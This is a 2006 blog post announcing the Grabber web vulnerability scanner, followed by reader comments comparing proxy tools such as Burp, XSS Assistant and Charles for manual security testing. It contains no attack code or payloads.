Grabber Released
Romain Gaucher published a pretty interesting tool this weekend called Grabber. Grabber is a tool written in Python (also has a .exe version) to do some of the attack vectors written on the XSS Cheat Sheet amongst others. I’m really excited to see this sort of development.
You know what I’d really like though? I’ve been dying to get my hands on something like Burp-proxy (preferably tied into it?) that allows me to auto-inject vectors based on a series of regex’s. Also the ability to automatically perform a number of the obfuscation functions programmatically - like automatically transform HTML into UTF-7, etc… I know the FishNetSecurity folks were working on something like this (and holy crap was it cool) but I really think it needs to be built into a proxy to be really effective for manual testing.
Anyway, cool stuff, and I hope to see more tools being produced to do this type of testing. The more we can automate this stuff the faster and more accurate it will get to do manual testing.
December 4th, 2006 at 1:46 am
when i do manual testing, i usually use burpproxy because it is fast (compared to other proxy tools). burp suite has intruder, which allows for some automatic/manual combined testing, but i usually work with the proxy-only version of burp.
XSS Assistant (Whiteacid’s Greasemonkey script) was great for manual testing, too. a combination of burpproxy and xss-assistant works great - find where some injection might work and then copy it manually into burp (and manually change the encodings accepted as well). i know that’s testing twice so i would like to see this functionality in the proxy tool itself as well.
besides speed, burp is just the best-of-class tool out there, especially for manual web application security assessment. you could combine manual and automatic methods such as described in this book:
http://safari5.bvdep.com/0596007949
where the author builds a log parser for burp here
http://safari5.bvdep.com/0596007949/networkst-CHP-8-SECT-3
and uses it as input for his simple scanner
http://safari5.bvdep.com/0596007949/networkst-CHP-8-SECT-5
as well as his extended scanner
http://safari5.bvdep.com/0596007949/networkst-CHP-9-SECT-1#X2ludGVybmFsX1NlY3Rpb25Db250ZW50P3htbGlkPTA1OTYwMDc5NDkvbmV0d29ya3N0LUNIUC05LVNFQ1QtMg==
i use a similar method with his log parse script and Unix shell + curl (he uses LWP and perl). some of these open-source scanners are getting pretty good. i’ve only used WebInspect on the commercial front, and didn’t like it (or at least didn’t like the price).
December 4th, 2006 at 8:33 am
I have to say that Grabber is not really for testing your big web apps. It turns to be very slow with thousands of URLS in the spider :/
For me, the most important part in grabber is the hybrid analysis module. Actually this is what I think that would be the more interesting for web developers.
But it also needs lots of development in other subject for its usability.
December 7th, 2006 at 7:01 pm
From recently reading `Hunting Security Bugs’ from Microsoft Press, I found out about two web proxy tools that I think you should know about.
The first, Web Proxy Editor, is included in the companion site for the book.
http://www.microsoft.com/mspress/companion/0-7356-2187-X/
It does support inline encoding tools for all different encoding types.
The other is Charles Web Debugging Proxy.
http://www.xk72.com/charles/
It seems to have some great features including the encoding support as well as tons of other features that I was really impressed with (e.g. AJAX debugging by viewing XHR calls).